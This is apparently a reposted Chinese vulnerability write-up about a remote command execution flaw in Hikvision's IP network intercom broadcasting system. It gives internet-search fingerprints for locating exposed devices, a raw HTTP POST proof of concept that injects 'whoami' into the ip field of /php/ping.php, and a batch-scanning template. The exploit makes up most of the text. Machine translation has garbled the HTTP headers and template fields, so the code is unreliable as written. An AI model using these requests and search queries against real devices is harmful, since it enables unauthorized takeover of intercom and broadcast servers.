发布于12月5日12月5日 # 免责声明: **文中涉及的漏洞已修复,敏感信息已编码。文章仅供经验分享。别当真。未经授权的攻击是违法的!文章中的敏感信息已经过多个级别的处理。因传播、使用本文提供的信息而造成的任何直接或间接的后果和损失均由用户自行承担。作者对此不承担任何责任。一切后果请自行承担。 ** ## 1:漏洞描述 海康威视网络对讲广播系统是海康威视提供的安全解决方案的一部分,用于管理和实现对讲和广播功能。该产品存在远程命令执行漏洞,允许攻击者获取服务器权限。 ## 2:受漏洞影响的版本 IP网络对讲广播系统 ## 三:网络空间地图查询 福法 `icon_hash=\'-1830859634\'` 猎人 `web.icon==\'e854b2eaa9e4685a95d8052d5e3165bc\'` ##四:漏洞复现 poc: ```` POST /php/ping.php HTTP/1.1 主机: x.x.x.x 用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:120.0)Gecko/20100101 Firefox/120.0 内容长度: 46 Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip、deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 连接:关闭 Content-Type: 应用程序/x-www-form-urlencoded X-Requested-With: XMLHttpRequest jsondata%5Btype%5D=123jsondata%5Bip%5D=whoami `` ## 批量检测 ```` id: Hikvision-网络对讲-广播-系统-RCE 信息: name: Hikvision-network-intercom-broadcasting-system-RCE 作者: 奶酪土拨鼠 严重性: 高 请求: - 原始: - |- POST /php/ping.php HTTP/1.1 Host: {{主机名}} 用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:120.0)Gecko/20100101 Firefox/120.0 内容长度: 46 Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip、deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 连接:关闭 Content-Type: 应用程序/x-www-form-urlencoded X-Requested-With: XMLHttpRequest jsondata%5Btype%5D=123jsondata%5Bip%5D=whoami 匹配器条件: 和 匹配器: - 输入:字 Part: 身体 字数: -管理员 - 根 - 类型:状态 状态: - 200 `` 转载自freebuf:[https://www.freebuf.com/articles/web/388571.html](https://www.freebuf.com/articles/web/388571.html) 作者:Cheese Marmot
创建帐户或登录后发表意见